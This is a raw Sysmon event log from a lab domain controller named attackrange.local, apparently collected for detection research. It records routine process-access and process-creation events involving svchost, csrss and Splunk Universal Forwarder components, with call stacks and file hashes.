10341000x80000000000000004853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:47.208{59A5CD1D-901B-6005-0B01-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.708{59A5CD1D-901C-6005-0D01-00000000A301}37244900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:41:48.567{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.567{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.568{59A5CD1D-901C-6005-0D01-00000000A301}3724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:41:48.176{59A5CD1D-901C-6005-0C01-00000000A301}29362316C:\Program 